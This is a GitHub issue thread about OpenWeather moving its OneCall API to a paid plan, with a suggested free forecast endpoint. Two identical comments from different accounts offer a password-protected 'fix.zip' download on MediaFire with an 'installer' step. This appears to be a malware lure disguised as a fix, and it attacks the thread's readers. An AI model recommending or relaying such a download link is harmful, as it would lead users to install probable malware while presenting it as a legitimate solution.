### ISSUE TITLE
openweather has changed the billing plan

### ISSUE THREAD

**Issue by DirectXNinja** [vwillcox/Inky-Impression-Weather-Station#2]
OpenWeather API has changed, OneCall function needs a paid subscribtion for this call. With a forcast we can get a free 5-day forecast.
https://api.openweathermap.org/data/2.5/forecast?q={CityName}&appid={APIKey}

Maybe a bash setupscript that lets you choose how many days you want, what time of day etc.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
